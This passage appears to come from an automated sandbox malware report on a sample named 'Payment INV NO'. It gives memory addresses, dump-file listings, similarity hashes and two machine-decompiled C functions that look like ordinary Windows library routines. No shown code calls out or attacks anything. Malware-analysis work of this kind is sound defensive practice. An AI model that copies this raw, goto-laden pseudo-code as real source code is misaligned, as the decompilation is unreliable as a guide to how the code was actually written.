                                                          0x01793a6c
                                                          0x01793a6f
                                                          0x00000000
                                                          0x01793a6f
                                                          0x01793a0c
                                                          0x017f0002
                                                          0x017f0003
                                                          0x017f0003
                                                          0x017f0008
                                                          0x00000000
                                                          0x017f0008
                                                          0x017939e7
                                                          0x017f0032
                                                          0x017f0036
                                                          0x017f0037
                                                          0x00000000
                                                          0x00000000
                                                          0x017f0039
                                                          0x017f003c
                                                          0x017f0041
                                                          0x00000000
                                                          0x017f0041
                                                          0x00000000
                                                          0x017939e7
                                                          0x017939aa
                                                          0x01793aae
                                                          0x01793ab7
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a29ced821838ca239de1cd0eba2ca08c69874d0db40367185260df46296eb864
                                                          • Instruction ID: ca6245f7f0831cfacf377c930db02ad2a688a042d8b8cb6fce4de2666b6e5c07
                                                          • Opcode Fuzzy Hash: a29ced821838ca239de1cd0eba2ca08c69874d0db40367185260df46296eb864
                                                          • Instruction Fuzzy Hash: 4351A071A007469FDB34DF69D888B6BF7AAFF45319F00452DE10687615CB78EA48CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0179B171 Relevance: .2, Instructions: 166COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E0179B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x186f7a8);
				E017ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E017ED130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E017DD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E017DF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L017EDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E017DB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E017DB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E017DE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E017DA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                          0x0179b171
                                                          0x0179b171
                                                          0x0179b171
                                                          0x0179b171
                                                          0x0179b171
                                                          0x0179b176
                                                          0x0179b17b
                                                          0x0179b180
                                                          0x0179b186
                                                          0x0179b18f
                                                          0x0179b198
                                                          0x0179b1a4
                                                          0x0179b1aa
                                                          0x017f4802
                                                          0x017f4802
                                                          0x017f4805
                                                          0x017f480c
                                                          0x017f480e
                                                          0x0179b1d1
                                                          0x0179b1d3
                                                          0x0179b1de
                                                          0x0179b1de
                                                          0x017f4817
                                                          0x017f481e
                                                          0x017f4820
                                                          0x017f4822
                                                          0x017f4822
                                                          0x017f4824
                                                          0x017f4824
                                                          0x017f482a
                                                          0x00000000
                                                          0x00000000
                                                          0x017f4835
                                                          0x017f483a
                                                          0x017f483d
                                                          0x017f483f
                                                          0x017f4842
                                                          0x017f4842
                                                          0x017f4842
                                                          0x017f4846
                                                          0x017f484c
                                                          0x017f484e
                                                          0x017f4851
                                                          0x017f4851
                                                          0x017f4853
                                                          0x017f4854
                                                          0x017f4854
                                                          0x017f4858
                                                          0x017f485a
                                                          0x017f485a
                                                          0x017f485d
                                                          0x017f485f
                                                          0x017f4861
                                                          0x017f4861
                                                          0x017f4866
                                                          0x017f486b
                                                          0x017f486e
                                                          0x017f4871
                                                          0x017f4876
                                                          0x017f4876
                                                          0x017f4878
                                                          0x017f487b
                                                          0x017f4884
                                                          0x017f4884
                                                          0x00000000
                                                          0x017f487d
                                                          0x017f487d
                                                          0x017f4882
                                                          0x017f4889
                                                          0x017f4889
                                                          0x017f488f
                                                          0x017f4891
                                                          0x017f48e0
                                                          0x017f48e2
                                                          0x017f48e4
                                                          0x017f48e4
                                                          0x017f48e7
                                                          0x017f48e7
                                                          0x017f48ed
                                                          0x017f48f4
                                                          0x017f48f6
                                                          0x017f4951
                                                          0x017f4951
                                                          0x017f4953
                                                          0x017f4953
                                                          0x017f4956
                                                          0x017f4956
                                                          0x017f4958
                                                          0x017f4959
                                                          0x017f4959
                                                          0x017f495d
                                                          0x017f495d
                                                          0x017f495f
                                                          0x017f495f
                                                          0x017f4965
                                                          0x017f4969
                                                          0x017f49ba
                                                          0x017f49ba
                                                          0x017f49c1
                                                          0x017f49c5
                                                          0x017f49cc
                                                          0x017f49d4
                                                          0x017f49d7
                                                          0x017f49da
                                                          0x017f49e4
                                                          0x017f49e5
                                                          0x017f49f3
                                                          0x017f4a02
                                                          0x00000000
                                                          0x017f4a02
                                                          0x017f4972
                                                          0x017f4974
                                                          0x00000000
                                                          0x00000000
                                                          0x017f4976
                                                          0x017f4979
                                                          0x017f4982
                                                          0x017f4983
                                                          0x017f4984
                                                          0x017f498b
                                                          0x017f498d
                                                          0x017f4991
                                                          0x017f4993
                                                          0x017f4999
                                                          0x017f499d
                                                          0x017f49a2
                                                          0x017f49a2
                                                          0x017f49a2
                                                          0x017f4999
                                                          0x017f49ac
                                                          0x00000000
                                                          0x017f49b3
                                                          0x017f48f8
                                                          0x017f48fe
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017f48fe
                                                          0x017f4895
                                                          0x017f489c
                                                          0x017f48ad
                                                          0x017f48b2
                                                          0x017f48b5
                                                          0x017f48b7
                                                          0x017f48ba
                                                          0x017f48bc
                                                          0x017f48c6
                                                          0x017f48c6
                                                          0x017f48cb
                                                          0x017f48d1
                                                          0x017f48d4
                                                          0x017f48d8
                                                          0x017f48d8
                                                          0x00000000
                                                          0x017f48d8
                                                          0x017f48be
                                                          0x017f48c0
                                                          0x00000000
                                                          0x00000000
                                                          0x017f48c2
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017f48c4
                                                          0x00000000
                                                          0x017f4882
                                                          0x017f487b
                                                          0x017f4904
                                                          0x017f4906
                                                          0x00000000
                                                          0x00000000
                                                          0x017f4908
                                                          0x017f490e
                                                          0x00000000
                                                          0x00000000
                                                          0x017f4910
                                                          0x017f4917
                                                          0x017f4917
                                                          0x00000000
                                                          0x017f4917
                                                          0x0179b1ba
                                                          0x017f47f9
                                                          0x017f47fc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017f47fc
                                                          0x0179b1c0
                                                          0x0179b1c0
                                                          0x0179b1c3
                                                          0x0179b1cb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a18f5864363b79de1df38f3d3d91a430298f6ce748d12dc3a211663619e2bdb1
                                                          • Instruction ID: 0f06fc2fd51208441a82f6cc815aa5a9e825c23ed7bf770693f2512f711b5771
                                                          • Opcode Fuzzy Hash: a18f5864363b79de1df38f3d3d91a430298f6ce748d12dc3a211663619e2bdb1
                                                          • Instruction Fuzzy Hash: 3F51AC71E0025A8BEB31CF68C844BAFFBF0AF04710F1141ADDA5AAB386D7744985CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017952A5 Relevance: .2, Instructions: 161COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E017952A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				signed char _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				signed char _t102;
				signed char _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E017AEEF0(0x18879a0);
					_t104 =  *0x1888210; // 0x1262cb0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E017AEB70(_t93, 0x18879a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E017D9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E017AEEF0(0x18879a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E017AEB70(0, 0x18879a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x1262cbd
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E017CF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E017AEEF0(0x18879a0);
									__eflags =  *0x1888210 - _t104; // 0x1262cb0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1888210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											L01814888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E017AEB70(_t95, 0x18879a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E017D95D0();
											E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E017D95D0();
											E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E017AEB70(_t93, 0x18879a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E017D95D0();
										E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E017D95D0();
										E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E017CF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                          0x017952a5
                                                          0x017952ad
                                                          0x017952b0
                                                          0x017952b3
                                                          0x017952b7
                                                          0x017952ba
                                                          0x017952bf
                                                          0x017952c4
                                                          0x017952cc
                                                          0x00000000
                                                          0x00000000
                                                          0x017952ce
                                                          0x017952d9
                                                          0x017952dd
                                                          0x017952e7
                                                          0x017952f7
                                                          0x017952f9
                                                          0x017952fd
                                                          0x017f0dcf
                                                          0x017f0dd5
                                                          0x017f0dd6
                                                          0x017f0dd7
                                                          0x017f0dd8
                                                          0x017f0dd9
                                                          0x017f0dde
                                                          0x017f0ddf
                                                          0x017f0de0
                                                          0x017f0de1
                                                          0x017f0de2
                                                          0x017f0de5
                                                          0x017f0dea
                                                          0x017f0dec
                                                          0x017f0f60
                                                          0x017f0f64
                                                          0x017f0f70
                                                          0x017f0f76
                                                          0x017f0f79
                                                          0x017f0f79
                                                          0x00000000
                                                          0x017f0f64
                                                          0x017f0df2
                                                          0x017f0df7
                                                          0x017f0e04
                                                          0x017f0e0d
                                                          0x017f0e0d
                                                          0x017f0e10
                                                          0x017f0e1a
                                                          0x017f0e1c
                                                          0x017f0e4c
                                                          0x017f0e52
                                                          0x017f0e61
                                                          0x017f0e67
                                                          0x017f0e6b
                                                          0x017f0e70
                                                          0x017f0e76
                                                          0x017f0ed7
                                                          0x017f0edc
                                                          0x017f0ee0
                                                          0x017f0ee6
                                                          0x017f0eea
                                                          0x017f0eed
                                                          0x017f0ef0
                                                          0x017f0ef3
                                                          0x017f0ef6
                                                          0x017f0ef9
                                                          0x017f0efe
                                                          0x017f0f01
                                                          0x017f0f01
                                                          0x017f0f0b
                                                          0x017f0f12
                                                          0x017f0f16
                                                          0x017f0f18
                                                          0x017f0f1b
                                                          0x017f0f2c
                                                          0x017f0f31
                                                          0x017f0f31
                                                          0x017f0f35
                                                          0x017f0f39
                                                          0x017f0f3a
                                                          0x017f0f3c
                                                          0x017f0f3f
                                                          0x017f0f50
                                                          0x017f0f55
                                                          0x017f0f55
                                                          0x017f0f59
                                                          0x017952eb
                                                          0x017952f1
                                                          0x017952f1
                                                          0x017f0e7d
                                                          0x017f0e84
                                                          0x017f0e88
                                                          0x017f0e8a
                                                          0x017f0e8d
                                                          0x017f0e9e
                                                          0x017f0ea3
                                                          0x017f0ea3
                                                          0x017f0ea7
                                                          0x017f0eaf
                                                          0x017f0eb3
                                                          0x017f0eb9
                                                          0x017f0eb9
                                                          0x017f0ebc
                                                          0x017f0ecd
                                                          0x017f0ecd
                                                          0x00000000
                                                          0x017f0eb3
                                                          0x017f0e21
                                                          0x017f0e2b
                                                          0x017f0e2f
                                                          0x017f0e30
                                                          0x017f0e3a
                                                          0x017f0e3f
                                                          0x017f0e41
                                                          0x00000000
                                                          0x00000000
                                                          0x017f0e47
                                                          0x00000000
                                                          0x017f0e47
                                                          0x017f0df9
                                                          0x017f0dfe
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017f0dfe
                                                          0x01795303
                                                          0x01795307
                                                          0x00000000
                                                          0x01795309
                                                          0x00000000
                                                          0x01795309
                                                          0x01795307
                                                          0x017952e9
                                                          0x017952e9
                                                          0x00000000
                                                          0x017952e9
                                                          0x0179530e
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
